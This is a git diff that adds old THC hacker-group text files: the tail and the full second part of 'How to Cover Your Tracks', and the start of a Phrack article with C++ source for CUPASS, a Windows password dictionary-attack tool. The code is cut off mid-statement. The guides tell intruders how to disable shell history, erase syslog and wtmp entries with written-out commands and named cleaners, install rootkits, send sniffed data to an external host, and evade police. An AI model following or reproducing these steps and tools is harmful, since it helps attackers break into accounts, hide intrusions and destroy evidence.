+     possiblities to identify the user : the UID, MAIL and HOME variables
+     are still exported and makes identifying of the account used by the
+     hacker easy. Before you do a telnet, change the USER, UID, MAIL and
+     HOME variable, maybe even the PWD variable if you are in the home
+     directory.
+
+     On HP-UX < v10 you can make hidden directories. I'm not talking about
+     . (dot) files or similar but a special flag. HP introduced it v9, but
+     was removed from version 10 (because it was only used by hackers ;-).
+     If you do a "chmod +H directory" it's invisible for the "ls -al".
+     To see the hidden directories you need to add the -H switch to ls, e.g.
+     "ls -alH" to see everything.
+
+     Whenever you are in need to change the date of a file, remember that
+     you can use the "touch" command to set the atime and mtime.
+     You can set the ctime only by raw writes to the harddisk ...
+
+     If you install sniffer and it's an important system, then make sure
+     that you either obfusicate the sniffer output (with an encryption
+     algorythm [and i'm not talking about rot13] or let the sniffer send
+     all the captured data via icmp or udp to an external host under your
+     control. Why that? If the admin finds somehow the sniffer (cpm and
+     other software checking for sniffers) they can't identify in the
+     logfile what data was sniffed, so he can't warn hosts sniffed by you.
+
+
+
+
+     V. UNDER SUSPECT
+     ----------------------------------------------------------------------
+
+     Once you are under suspect (by either police and/or administrator) you
+     should take special actions so they won't get evidence on you.
+
+     NOTE : If the administrators think you are a hacker,
+            YOU ARE GUILTY UNTIL PROVEN INNOCENT
+
+     The laws means nothing to the admins (sometimes I think the difference
+     between a hacker and an administrator is only that the computer belongs
+     to them). When they think you are a hacker you are guilty, without a
+     lawyer to speak for you. They'll monitor you, your mails, files, and,
+     if they are good enough, your keystrokes as well.
+
+     When the feds are involved, you phone line might be monitored too,
+     and a raid might come soon.
+
+     If you notice or fear that you are under suspect then keep absolutely
+     low profile! No offensive action which points to hacking should be done.
+
+     Best thing is to wait at least 1-2 month and do nothing.
+     Warn your friends not to send you any email, public normal only,
+     non-offensive mail is wonderful, put pgp encrypted emails will ring the
+     alarm bells of monitoring admins and feds. Cut down with everything,
+     write some texts or program tools for the scene and wait until things
+     have settled. Remember to encrypt all your sensitive data and remove
+     all papers with account data, phone numbers etc. Thats the most
+     important stuff the feds are looking for when they raid you.
+
+
+
+     VI. CAUGHT
+     ----------------------------------------------------------------------
+
+     Note that this small chapter covers only the ethics and basics and
+     hasn't got any references to current laws - because they are different
+     for every country.
+
+     Now we talking about the stuff you should/shouldn't do once the feds
+     visited you. There are two *very* important things you have to do :
+     1) GET A LAWYER IMMEDEANTELY !
+        The lawyer should phone the judge and appeal against the search
+           warrant. This doesn't help much but may hinder them in their work.
+           The lawyer should tell you everything you need to know what the
+           feds are allowed to do and what not.
+           The lawyer should write a letter to the district attorney and/or
+           police to request the computers back as fast as possible because
+           they are urgently needed to do business etc.
+           As you can see it is very useful to have got a lawyer already
+           by hand instead of searching for one after the raid.
+        2) NEVER TALK TO THE COPS !
+           The feds can't promise you anything. If they tell you, you'll get
+           away if you talk, don't trust them! Only the district attorney
+           has got the power to do this. The cops just want to get all
+           information possible. So if you tell them anything they'll have
+           got more information from and against you.
+           You should *always* refuse to give evidence - tell them that you
+           will only talk with them via your lawyer.
+
+     Then you should make a plan with your lawyer how to get you out of this
+     shit and reduce the damage.
+     But please keep in mind : don't betray your friends. Don't tell them
+     any secrets. Don't blow up the scene.
+     If you do, that's a boomerang : the guys & scene will be very angry
+     and do revenge, and those guys who'll be caught because of your
+     evidence will also talk ... and give the cops more information about
+     *your* crimes!
+
+     Note also that once you are caught you get blamed for everything which
+     happened on that site. If you (or your lawyer) can show them that they
+     don't have got evidences against you for all those cases they might
+     have trouble to keep the picture of that "evil hacker" they'll try to
+     paint about you at the court. If you can even prove that you couldn't
+     do some of the crimes they accuse you for then your chances are even
+     better. When the judge sees that false accuses are made he'll suspect
+     that there could be more false ones and will become distrusted against
+     the bad prepared charges against you.
+
+     I get often asked if the feds/judge can force you to give up your
+     passwords for PGP, encrypted files and/or harddisks.
+     That's different for every country. Check out if they could force you
+     to open your locked safe.
+     If that's the case you should hide the fact that you are crypting your
+     data! Talk with your lawyer if it's better for you to stand against
+     the direction to give out the password - maybe they'd get evidences
+     which could you get into jail for many years.
+
+     (For german guys : THC-MAG #4 will have got an article about the german
+      law, as far as it concerns hacking and phreaking - that article will
+      be of course checked by a lawyer to be correct. Note that #4 will only
+      discuss germany and hence will be in the german language.
+      But non-germans, keep ya head up, this will be the first and last german
+      only magazine release ;-)
+
+
+
+
+     VII. PROGRAMS
+     ----------------------------------------------------------------------
+
+     Here is a small list of programs you should get and use (the best!).
+     DON'T email me where to get them from - ask around in the scene!
+     I only present here the best log modifiers (see III-4 and IV-3).
+     Other programs which are for interest are telnet redirectors (see IV-2)
+     but there are so many, and most compile only on 1-3 unix types so there's
+     no use to make a list.
+
+     First a small glossary of terms :
+          Change    - Changes fields of the logfile to anything you want
+          Delete    - Deletes, cuts out the entries you want
+          Edit      - real Editor for the logfile
+          Overwrite - just Overwrites the entries with zero-value bytes.
+                      Don't use such software (f.e. zap) - it can be detected!
+
+                               LOG MODIFIER
+     ah-1_0b.tar  Changes the entries of accounting information
+     clear.c      Deletes entries in utmp, wtmp, lastlog and wtmpx
+     cloak2.c     Changes the entries in utmp, wtmp and lastlog
+     invisible.c  Overwrites utmp, wtmp and lastlog with predefines values, so
+                  it's better than zap. Watch out, there are numerous inv*.c !
+     marryv11.c   Edit utmp, wtmp, lastlog and accounting data - best!
+     wzap.c       Deletes entries in wtmp
+     wtmped.c     Deletes entries in wtmp
+     zap.c        Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!
+
+
+
+
+     VIII. LAST WORDS
+     ----------------------------------------------------------------------
+
+     Last fucking words:
+     Don't get caught, remember these tips and keep your ears dry.
+     If someone would like to correct some points, or would like to
+     add a comment, or needs more information on a topic or even thinks
+     something's missing - then drop me a note.
+
+
+                         van Hauser
+
+
+
+Type Bits/KeyID    Date       User ID
+pub  1024/3B188C7D 1995/10/10 van Hauser/THC of LORE BBS
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3i
+
+mQCNAzB6PNQAAAEEALx5p2jI/2rNF9tYandxctI6jP+ZJUcGPTs7QTFtF2c+zK9H
+ElFfvsC0QkaaUJjyTq7TyII18Na1IuGj2duIHTtG1DTDOnbnZzIRsXndfjCIz5p+
+Dt6UYhotbJhCQKkxuIT5F8EZpLTAL88WqaMZJ155uvSTb9uk58pv3AI7GIx9AAUT
+tBp2YW4gSGF1c2VyL1RIQyBvZiBMT1JFIEJCU4kAlQMFEDJ2gzNAf3b9d/IP1QEB
+5DwD+gJRh6m4h0fVgpQJkOiuQD68lV5w8C0F5R3jk/o6Pollaf7gtVhG8BGGo5/7
+/yiH40gujc82rJdmihwcKuZQtwt8X28VN8uy56SCpXD5wjjOZpq0t0qSXmhgunZ0
+m7xv7R4mWRzFclsgQCMwXNgp4sXgw64bVm8FhEdkrVSO8iTyiQCVAwUQMkMhCspv
+3AI7GIx9AQFstAP+Jrg7V06FGV/sTzegFNoaSyOItkvXjctzFsXuBfta2M7EzPX3
+UR3kM4/W4xE70H4XmMOJ9RmTzs+MuhSq8BtGQtYaJqGjxe/ldbvGOXRxR1rBJAKS
+yDQYu0VJ/Ae8yuJcMS312jqwg8OLgYnQaqEoaRM4HEiB+hgDRqnFKpDxkhSJAJUD
+BRAyQx8E5y7IvlL6xvEBAQ+bA/9baK7f3M9F5n4aASy04WHOreUNpGQ8DXgtMVq7
+KVdXMIWjURsboR+wt5eJTPeL00lHS5eqmZlNzGV9hWtzAr20qrKLmvE20Ke4VPB0
+a/tWXNUdvLnk4ENbTBFfMMdnlDo3hSThSMQ7yZ9UEYgighKu6l2fG5UG6D+kXFLy
+iIvvlA==
+=nX2w
+-----END PGP PUBLIC KEY BLOCK-----
+
+ ------------------------------------------------------------------------------
+

Papers/cover-2.txt

@@ -0,0 +1,219 @@
+ ------------------------------------------------------------------------------
+
+
+
+               ################################################
+               #                                              #
+               #           HOW TO COVER YOUR TRACKS           #
+               #                                              #
+               ################################################
+
+
+
+
+                            PART TWO : PRACTICE
+
+
+
+
+
+
+
+
+
+
+
+   I. THE FIRST COMMAND
+
+   The first command you should enter after logging in with a hacked account
+   is a shell different from the one you are currently running as login shell.
+   The purpose is to disable history saving of the commands you'll type in
+   while hacking. A history check by the real user or sysadmin reveils your
+   presence and what you did!!
+   If you are running a CSH then execute a SH and vice versa.
+
+$   <- this is a SH prompt
+%   <- this is a CSH prompt
+
+   If it does not look like the standard prompts above then execute SH.
+   If the prompt stays the same, type "exit" and execute the CSH ...
+   The reason for using these two shells and not bash, ksh, zsh etc. is
+   that these two are simple with no extra options enabled by default
+   (like history saving).
+
+
+   II. LASTLOG WORKAROUND
+
+   If you saw a text like "Last successful login from alpha.master.mil"
+   when you logged on with the hacked account and you can't hack root or
+   don't want to disrupt the system logs with deleting data then execute
+   the following : "rlogin <the_host_you_are_on>" and provide again the
+   password of the hacked account if necessary. After seeing the shell
+   prompt type exit to be back again. This will change the header
+   "Last login from ..." etc. to the <current host> or "localhost" 
+   which is much more unsuspicious than "site.real.user.never.saw.com"
+   Of course you only need to do this if your origin host might attract
+   attention to user and/or sysadmin.
+
+
+   III. WHO WORKAROUND
+
+   After completing step 1 + 2 type "w" ... you'll see all currently
+   online users ... with the adress they logged on from. Once again
+   something like your origin host in the netherlands will be very
+   suspicious to users and/or root if the site is in the usa.
+   If you can't hack root or once again don't want to tamper with the
+   log files you can try a bug which works still for many up2date
+   unix distributions: just execute "login" with the same login+password.
+   Type "w" again and if it worked, your origin will be changed to
+   something like "tty05".
+   Of course you only need to do this if your origin host might attract
+   attention by other users and/or sysadmin.
+   
+
+   V. EXECUTING PROGRAMS
+
+   Don't execute programs with suspicous names ... ISS and YPX are for
+   example very suspicous, and a skilled admin knows what's going on if
+   he sees a user running "loadmodule SandraBullok" on his Sun ... ;-)
+   Either you copy & rename the commands or you use those sources around
+   which exchanges the command name in the process list.
+   Btw. the process list can be checked by "ps -ef" or "ps -auxwww" and
+   the current command every user is executing with "w" and the most CPU
+   consuming processes with "top" ... so it's really easy to monitor 
+   the programs the user(s) are running.
+
+
+   VI. EXECUTING TELNET
+
+   There are only two things which should be said about about using telnet
+   for hacking purpose (e.g. doing a telnet to the next target).
+   First NEVER just type "telnet target.host.com". Type "telnet" and then
+   "open target.host.com" which will not show up as parameter in the process
+   list. The seconds is that some telnet clients do export enviroment
+   variables. And if your hack is detected and they could trace the
+   connection back to your origin host they could also have got the account
+   you used on the origin host. So redefine (to anything you want) the
+   following environement variables before starting telnet, rlogin or similar: 
+   USER, LOGNAME, UID, HOME, MAIL - maybe you should do a "cd /tmp" too
+   to change the PWD variable too ...
+   To change those variables ->
+      SH : <variable>=<new_value>;export <variable>
+           example : USER=nobody;export USER
+      CSH: setenv <variable> <new_value>
+           example : setenv USER nobody
+ 
+   and don't forget to reset the variables after your telnet if you want to
+   do something with the account before you log out.
+
+
+   VII. REMOVE YOUR FILES
+
+   When you tried exploits - successful or not - delete them immedeantely
+   after trying them - especially if you try them in /tmp !
+   Nothing is more interesting than snooping in the /tmp directory to see
+   what other users are doing ... If you really need to work in the temp
+   directory (because suid is squashed in your home dir) then create a
+   usual directory like ".X11", and give it 711 permissions.
+   Remember, if someone snoops in the directories while you are hacking or
+   your loose connection and can't relogin or you forget about them you
+   are in deep trouble.
+
+
+   -->  !  The following 2 points are only possible with root access !  <--
+
+
+   VI. MODIFYING THE LOGS
+
+   The important log files are LASTLOG, WTMP and UTMP.
+   If you were successful in hacking root then you should modify them.
+   They can usually be found in /etc, /var/adm or /var/log ... it differs,
+   just check the man pages.
+   Which tools should you use? ZAP (or ZAP2) is nice, but it does NOT delete
+   you from the logs but overwrite the entries with zeros. CERT already
+   published tools which easily check the logs for those overwritten entries.
+   And nothing shouts more "Hey there's a hacker on the system with root
+   access!" into the sysadmin's face than that.
+   Important for ZAP : Check the paths defined in the sources for the logs!
+   Try CLOAK2 which can change the data of the important data fields ;) But
+   it doesn't compile on all unix OS types.
+   You can also try CLEAR, included in this magazine, which REALLY deletes
+   the entries ... ;)
+
+   
+   VII. SYSLOG & LASTCOMM
+
+   You should also check the syslog messages logfile if maybe entries with
+   your hacked account or your origin host are in it. It's usually located
+   in /var/adm or /var/log ... most time it's called "messages" but again
+   can differ - and also check other logfiles there which are generated by
+   auth.* and authpriv.* messages (and of course xferlog etc.).
+   Check the file /etc/syslog.conf to see the correct file and check out what
+   is logged to which file/program/mail/user.
+   If you see something like "@loghost" and you find your origin host in
+   the messages file than you've got a problem. It's also logged at another
+   site which is most time not accessible from remote. But try to install
+   a sniffer, (see section VIII. !) and check if a root does a successful
+   login to the loghost - and then you've got also the password for that
+   host and are in to handle the problem ;)
+   To remove f.e. your hostname from the "messages" logfile execute :
+   "grep -v evil.host.com messages > /tmp/tmpfile; mv /tmp/tmpfile messages"
+
+   LASTCOMM (from accton etc.) is a tool to log all executed commands, with
+   a flag if the file executed had the SUID flag set and if a command was
+   executed by root. You can find this logfile in the same directory as the
+   syslog file. That's a really evil tool against hackers but - luck! -
+   most times it is not installed. But now you don't have to fear that
+   anymore :) Get Zhart's excellent ACCT Cleaner and feel the freedom ;-)
+
+   
+   VIII. INSTALLING TROJANS
+
+   When you install a sniffer, remember that anyone can execute "ifconfig -a"
+   to check if the card is in promiscious mode. Get a rootkit for your unix
+   OS and replace it. Run fixer.c on it for the correct checksum and date/time
+   but check the root account first if maybe tripwire or other binary checker
+   are installed! Remember this for every binary you replace. If the binary
+   is in a directory which is NFS mounted and can't be remounted in write mode
+   then you must first hack the NFS host - life isn't easy sometimes ;)
+
+
+
+   X. THE END
+
+   I hope you had fun and learned alot from these two textfiles, the
+   theory/background and the practice one.
+   For updates, tips, tricks etc. just email me at  ->  mc@thc.net
+   Remember : Never get lazy. Every work must be done 100% -
+              or face the consequences!
+
+
+                         van Hauser
+
+
+
+Type Bits/KeyID    Date       User ID
+pub  1024/3B188C7D 1995/10/10 van Hauser/THC of LORE BBS
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3i
+
+mQCNAzB6PNQAAAEEALx5p2jI/2rNF9tYandxctI6jP+ZJUcGPTs7QTFtF2c+zK9H
+ElFfvsC0QkaaUJjyTq7TyII18Na1IuGj2duIHTtG1DTDOnbnZzIRsXndfjCIz5p+
+Dt6UYhotbJhCQKkxuIT5F8EZpLTAL88WqaMZJ155uvSTb9uk58pv3AI7GIx9AAUT
+tBp2YW4gSGF1c2VyL1RIQyBvZiBMT1JFIEJCU4kAlQMFEDJ2gzNAf3b9d/IP1QEB
+5DwD+gJRh6m4h0fVgpQJkOiuQD68lV5w8C0F5R3jk/o6Pollaf7gtVhG8BGGo5/7
+/yiH40gujc82rJdmihwcKuZQtwt8X28VN8uy56SCpXD5wjjOZpq0t0qSXmhgunZ0
+m7xv7R4mWRzFclsgQCMwXNgp4sXgw64bVm8FhEdkrVSO8iTyiQCVAwUQMkMhCspv
+3AI7GIx9AQFstAP+Jrg7V06FGV/sTzegFNoaSyOItkvXjctzFsXuBfta2M7EzPX3
+UR3kM4/W4xE70H4XmMOJ9RmTzs+MuhSq8BtGQtYaJqGjxe/ldbvGOXRxR1rBJAKS
+yDQYu0VJ/Ae8yuJcMS312jqwg8OLgYnQaqEoaRM4HEiB+hgDRqnFKpDxkhSJAJUD
+BRAyQx8E5y7IvlL6xvEBAQ+bA/9baK7f3M9F5n4aASy04WHOreUNpGQ8DXgtMVq7
+KVdXMIWjURsboR+wt5eJTPeL00lHS5eqmZlNzGV9hWtzAr20qrKLmvE20Ke4VPB0
+a/tWXNUdvLnk4ENbTBFfMMdnlDo3hSThSMQ7yZ9UEYgighKu6l2fG5UG6D+kXFLy
+iIvvlA==
+=nX2w
+-----END PGP PUBLIC KEY BLOCK-----
+
+ ------------------------------------------------------------------------------
+

Papers/cupass.txt

@@ -0,0 +1,808 @@
+
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x10 of 0x12
+
+|=---------=[ CUPASS AND THE NETUSERCHANGEPASSWORD PROBLEM ]=------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------=[ Doc Holiday / THC <holiday@thc.org> ]=----------------=|
+
+
+
+----|  INTRODUCTION
+
+
+
+Microsoft has a known problem in Windows NT 4, that enables an attacker
+to change the password of any user under special/default circumstances.
+
+
+The same problem reappeared in Windows 2000 some days ago. The flaw exists
+in Microsofts implementation of the NetUserChangePassword function.
+
+
+These facts inspired me to write this article and CUPASS, a simple tool 
+that starts a dictionary attack against user accounts. 
+
+
+In this article I want to discuss all things worth knowing about the 
+NetUserChangePassword problem.
+
+
+Have fun while reading this article...
+
+
+Doc Holiday /THC
+
+
+
+
+----| THE PASSWORD CHANGE PROTOCOLS
+
+
+As a little background I will tell you something about the possibilites
+to change a password in a Windows NT/W2K environment.
+
+
+Windows 2000 supports several protocols for changing passwords which
+are used under different circumstances. 
+
+
+These protocols are 
+
+
+- NetUserChangePassword protocol (we will call it NUCP)
+- NetUserSetInfo protocol
+- Kerberos change-password protocol
+- Kerberos set-password protocol
+- LDAP write-password attribute (presumes 128Bit SSL)
+- XACT-SMB protocol (for LAN Manager compatibility)
+
+
+Because there is a flaw in Microsofts implementation of the NUCP protocol,
+we will have a deeper look at this one.
+
+
+
+----| PROTOCOL ELECTION
+
+
+We can see that there are a lot of protocols for changing passwords in an 
+Microsoft environment. Now I will show in which cases the NUCP is used:
+
+
+case 1
+------
+
+
+If a user changes his password by pressing CTRL+ALT+DELETE and pressing the 
+"Change Password" button, the NUCP protocol is used, if the target is a
+domain or the local member server or workstation.
+
+
+If the target is a Kerberos realm, the Kerberos change-password protocol is 
+used instead of NUCP.
+
+
+case 2
+------
+
+
+If a change password request is initiated from an Windows NT 3.x or NT 4
+machine, the NUCP and/or NetUserSetInfo protocols are used.
+
+
+case 3
+------
+
+
+If a program uses the NUCP method on the Active Directory Services
+Interface (ADSI), the IaDSUser interface first tries to change the
+password with the LDAP protocol, and then by using the NUCP method.
+
+
+
+
+----| NUCP FUNCTION CALL
+
+
+At this time we know that a lot of ways exist to change a users 
+password. We also know in which cases NUCP is used.
+
+
+Now we want to have a little look at the function NetUserChangePassword
+itself. (More detailed information can be found at Microsoft's SDK!)
+
+
+
+Prototype
+---------
+
+
+The prototype of the NetUserChangePassword function is defined in
+"lmaccess.h", and looks as follows:
+
+
+
+NET_API_STATUS NET_API_FUNCTION
+NetUserChangePassword (
+    IN  LPCWSTR   domainname OPTIONAL,
+    IN  LPCWSTR   username OPTIONAL,
+    IN  LPCWSTR   oldpassword,
+    IN  LPCWSTR   newpassword
+    );
+
+
+
+The parameters are explained consecutively:
+
+
+
+Parameters
+----------
+
+
+->domainname
+  ----------
+
+
+  Pointer to a null-terminated Unicode string that specifies the name of a 
+  remote server or domain. 
+
+
+->username
+  --------
+
+
+  Pointer to a null-terminated Unicode string that specifies a user name. 
+
+
+->oldpassword
+  -----------
+
+
+  Pointer to a null-terminated Unicode string that specifies the user's
+  old password on the server or domain. 
+
+
+->newpassword
+  -----------
+
+
+  Pointer to a null-terminated Unicode string that specifies the user's new
+  password on the server or domain.  
+
+
+
+Return values
+-------------
+
+
+The return values are defined in "LMERR.H" and "WINERROR.H".
+
+
+With a deeper look in this files we can see that if the function was executed
+with success, the return value is 0 (zero) btw. NERR_Success.
+
+
+
+The most important error values are:
+
+
+->ERROR_ACCESS_DENIED (WINERROR.H)
+  --------------------------------
+
+
+  Access is denied ;)
+
+
+  If the target is a NT Server/Domain Controller, and the
+  option "User Must Log On in Order to Change Password" is enabled,
+  this error code is the result of CUPASS. The password could
+  not be guessed :(
+
+
+  If the target is a W2K domain controller with AD installed,
+  and the EVERYONE group is removed from the group
+  "Pre-Windows 2000 compatible access", than this error code
+  is an result of NUCP.
+
+
+  In some cases this means the right password was guessed by
+  CUPASS, but could not be changed because of insufficient
+  permissions on the corresponding AD object.
+
+
+
+->ERROR_INVALID_PASSWORD (WINERROR.H)
+  -----------------------------------
+
+
+  The guessed password (oldpassword) was invalid
+
+
+
+->ERROR_ACCOUNT_LOCKED_OUT (WINERROR.H)
+  -------------------------------------
+
+
+  The account is locked due to many logon tries.
+
+
+
+->ERROR_CANT_ACCESS_DOMAIN_INFO (WINERROR.H)
+  ------------------------------------------
+
+
+  Indicates a Windows NT Server could not be contacted or that
+  objects within the domain are protected such that necessary
+  information could not be retrieved.
+
+
+
+->NERR_UserNotFound (LMERR.H)
+  ---------------------------
+
+
+  The useraccount could not be found on the given server.
+
+
+
+->NERR_NotPrimary (LMERR.H)
+  -------------------------
+
+
+  The operation is only allowed on the PDC. This appears e.g. if 
+  you try to change passwords on a BDC.
+
+
+
+This return values are evaluated by CUPASS. For all others, the numeric
+value will be shown, and you can simply have a look at this files for 
+the meaning of the errorcode.
+
+
+
+
+MORE DETAILS ON NUCP API CALL
+-----------------------------
+
+
+The NUCP function is only available on Windows NT and Windows 2000
+platforms.
+
+
+As part of the LanMan-API the NUCP function is UNICODE only!!! 
+This makes the programming a little bit harder, but not impossible :)
+
+
+UNICODE on Windows is an topic for itself, and we dont want to talk more
+about it here. Have a look at Microsofts msdn webpage or Charles
+Petzolds book about Windows programming, if you are interested in this
+topic.
+
+
+For a successfull usage of NUCP, you have to link your program with the 
+"Netapi32.lib" library!
+
+
+
+
+----| REQUIRED PERMISSIONS FOR NUCP 
+
+
+NUCP is part of the Microsoft network management functions.
+The management functions consists of different groups like
+NetFileFunctions, ScheduleFunctions, ServerFunctions, UserFunctions etc.
+
+
+These functions are again splitted in Query Functions and Update Functions. 
+Whilst query functions just allow to query informations, the update
+functions allow changes on objects.
+
+
+An example for a query function is e.g the NetUserEnum function which
+provides information about all user accounts on a server. 
+
+
+An example for an update function is the NetUserChangePassword function
+which changes the password of a user account :)
+
+
+Its easy to imagine, that query functions need less permissions than update
+functions for beeing executed.
+
+
+
+Lets have a look what permissions are needet:
+
+
+
+WINDOWS NT
+----------
+
+
+The query functions like NetGroupEnum, NetUserEnum etc. and can be
+executed by all authenticated users.
+
+
+This includes Anonymous users, if the RestrictAnonymous policy setting
+allows anonymous access.
+
+
+On a Windows NT member server, workstation or PDC, the
+NetUserChangePassword function can only be (successfull) executed by
+Administrators, Account Operators or the user of the account, if the option
+'User Must Log On in Order to Change Password' for this user is enabled.
+
+
+If 'User Must Log On in Order to Change Password'  is not enabled, a user can
+change the password of any other user, as long he knows the actual password.
+
+
+
+WINDOWS 2000
+------------
+
+
+The query functions like NetGroupEnum, NetUserEnum etc. can be executed by
+all authenticated users. This includes Anonymous users, if the
+RestrictAnonymous policy setting allows anonymous access.
+
+
+On a W2K member server or workstation the NetUserChangePassword function
+should only be (successfully) executable by Administrators, Account
+Operators or the user of the account.
+
+
+That this isn't the case, can be shown with CUPASS, because here is the
+flaw that Microsoft made with his implementation of NetUserChangePassword.
+
+
+On W2K member servers and workstations, the NetUserChangePassword function
+can be successfully executed by any user who knows the current password of
+the attacked user account.
+
+
+
+( For your information:
+
+
+The option 'User Must Log On in Order to Change Password' has been removed
+>from W2K! )
+
+
+
+On a W2K domain controller with Active Directory, access to an object is
+granted based on the ACL of the object (Because W2K with installed AD
+stores the user passwords in the AD in contrast to NT 3.x/4).
+
+
+Network management query functions are permitted to all authenticated
+users and the members of the group "Pre-Windows 2000 compatible access"
+by the default ACL's.
+
+
+Theoretical Network Management Update functions like NUCP are only
+permitted to Administrators and Account Operators.
+
+
+That this is not the case, can also be shown with CUPASS.
+
+
+CUPASS works fine if AD is installed on the target system.
+
+
+If the "everyone" group is removed from the
+"Pre-Windows 2000 compatible access" group, the result of CUPASS will
+be Errorcode 5, which means ACCESS_DENIED!.
+
+
+My research shows that anyhow the password is guessed by CUPASS, but
+can not be changed because of insufficient permissions on the AD object!
+
+
+
+----| ANONYMOUS CONNECT
+
+
+There is something I didn't talk about much, the Anonymous User Problem,
+also known as the NULL-User problem.
+
+
+Lets have a short look at how the Anonymous security settings will take affect
+to the NUCP problem:
+
+
+-> W2K
+   ---
+
+
+   The value Data of the following registry value regulates the behaviour
+   of the operating system regarding to the NULL USER CONNECT.
+
+
+   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 
+   Value: RestrictAnonymous
+   Value Type: REG_DWORD
+
+
+   If RestrictAnonymous is set to 0 (zero), which is the default setting,
+   CUPASS will work properly.
+
+
+   If RestrictAnonymous is set to 1, what means the enumeration of SAM
+   accounts and names is not allowed, CUPASS will work properly.
+  
+   If RestrictAnonymous is set to 2, what means no access without explicit
+   anonymous permissions, there is no possibility to change the password
+   with NUCP :(
+   
+   Because the value 2 has comprehensive consequences to the behaviour of
+   the windows environment (e.g. Browser service will not work properly,
+   netlogon secure channels could not be established properly by member
+   workstations etc..) it is rare used. 
+
+
+   These settings are the same on W2K member server and W2K DC with AD!
+
+
+
+-> NT4
+   ---
+ 
+   The value Data of the following registry value regulates the behaviour
+   of the operating system regarding to the NULL USER CONNECT.
+
+
+   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 
+   Value: RestrictAnonymous
+   Value Type: REG_DWORD
+
+
+   Converse to W2K there are only two valid values 0 (zero) and 1 for
+   RestrictAnonymous.
+
+
+   If RestrictAnonymous is set to 0 (zero), which is the default setting,
+   CUPASS will work properly.
+
+
+   If RestrictAnonymous is set to 1, what means the enumeration of SAM
+   accounts and names is not allowed, CUPASS will work properly.
+
+
+
+
+
+
+COMMON
+------
+
+
+The process that calls the NetUserChangePassword function in some cases
+must have the SE_CHANGE_NOTIFY_NAME privilege
+(except for system account and members of the local Administrator group).
+Per default this privilege is enabled for every account, but can be
+disabled by the administrator.
+
+
+SE_CHANGE_NOTIFY_NAME could not be found at the privileges,
+because it is called "Bypass traverse checking"!
+
+
+This is an declarative from Microsoft. I tried it, but I didn't find a case
+in that this right was necessary to execute the NUCP function call.
+
+
+
+
+----| POLICY AND LOGGING
+
+
+I will have a look for the policy settings, that will take affect to the
+NUCP problem.
+
+
+
+ACCOUNT POLICIES
+----------------
+
+
+->PASSWORD POLICY
+  ---------------
+  
+  The settings "Enforce password history" and  "Minimum password age"
+  will take effect to the result of CUPASS, in the way that CUPASS can't
+  "realy" change the password, and the error code 2245 will result. 
+ 
+  But this doesn't matter, because we know the "old" password at this time,
+  and CUPASS just tried to replace the "old" password with the "old"
+  password again.
+    
+
+
+->ACCOUNT LOGOUT POLICY
+  ---------------------
+ 
+  Account lockout treshold
+  ------------------------
+
+
+  The settings "Account lockout duration" and
+  "Reset Account lockout after ..." are only relevant if the
+  "Account lockout treshold" ist set to any value >0.
+
+
+  If the treshold is set, than this takes affect to the work of CUPASS,
+  because all attempts of CUPASS exceeding the treshold will lead to an
+  account lockout :(
+
+
+  However the Logout Policy ist not valid for the Administrator on NT4
+  environments, until the NT Reskit tool "Passprop" is used!
+  In this case even the Administator account will be locked
+  for network logons!
+
+
+  If we start CUPASS against any account of a W2K server or a W2K domain
+  controller with AD, this account is locked out, and even the
+  Administrator account is marked as "Account is locked out", too !
+
+
+  But it is still possible for the Administrator account to log on
+  interactive on the machine!
+
+
+  
+  
+
+
+
+AUDIT POLICY
+------------
+
+
+  Lets have a look which auditing events have to enabled, to see an
+  CUPASS attack in the security logs of the target machine.
+
+
+  
+  Audit Account Management
+  ------------------------
+
+
+  If the setting "Audit Account Management" is enabled (success/failure),
+  an entry with the ID 627 appears in in the security log.
+
+
+  This entry contains all necessary datas for the administrator :(
+  These e.g. are: Date, Time, Target Account Name, Caller User Name etc.
+
+
+  
+  Audit account logon events
+  --------------------------
+
+
+  Surprisingly for some administrators, there appears no log entry if
+  the settings "Audit account logon events" or "Audit logon events"
+  are enabled, if the attack goes to the local machine.
+
+
+  This is e.g. the case if you want to guess the local administrator
+  password of your machine.
+
+
+  If the CUPASS attack comes from remote, log entries ID 681 and ID 529
+  occures.
+
+
+
+  Audit Object Access
+  -------------------
+  
+  If this type of auditing is enabled, and the attack goes to the
+  local machine, an logfile entry with the ID 560 and 562 appears.
+
+
+  ID 560 tells us that someone opened the object
+  "Security Account Manager" whilst 562 tells us something like
+  "Handle closed"...
+
+
+
+Maybe there occure some more logfile entries with other ID's, but these
+ones listed above are the ones I found while testing CUPASS.
+
+
+So test CUPASS on your own environment and have a look into your logfiles!
+
+
+
+
+----| LAST WORDS
+
+
+I hope this article could give you a little overview about the
+NetUserChangePassword problem, and Microsoft's inconsequent implementation
+of security and function calls.
+
+
+This article could not treat this topic concluding, because there are
+so many different situations and configurations that I could not test
+in my short sparetime :)
+
+
+
+----| GREETS
+
+
+Greets to Van Hauser who inspired me for this release, ganymed, mindmaniac
+and all the other members from THC, VAX who gives me a lift to HAL2001,
+the guys from TESO, Seth, Rookie and all the other people knowing me...
+
+
+The biggest THANX are going to my wife, who missed me nearly the whole
+weekend while I was writing this article!
+ 
+Ok, have a nice day and lets meet and party at HAL2001 :)
+
+
+
+<++> cupass.cpp !a10c7302
+/*
+ * CUPASS v1.0 (c) 2001 by Doc Holiday / THC <Holiday@thc.org>
+ * http://www.hackerschoice.com
+ *
+ * Dictionary Attack against Windows Passwords with NetUserChangePassword.
+ * Do only use for legal purposes.
+ * 
+ * Compiled and tested on Windows NT/W2K - runs not on Win9x!!
+ * Compiled with VC++ 6.0
+ *
+ */
+
+
+#define UNICODE 1
+#define _UNICODE 1
+
+
+#include <windows.h>
+#include <lmaccess.h>
+#include <stdio.h>
+#include <wchar.h>
+
+
+#pragma comment( lib, "netapi32.lib" )
+
+
+
+void wmain( int argc, wchar_t *argv[] )
+{
+        wchar_t *hostname = 0; 
+        wchar_t *username = 0; 
+        wchar_t *dictfile = 0; 
+        wchar_t myChar[256];
+        NET_API_STATUS result;
+        FILE *stream;
+        LPWSTR oldpassword; 
+
+
+        if (argc != 4)
+        { 
+        wprintf (L"\nMissing or wrong parameters!\n"); 
+            wprintf (
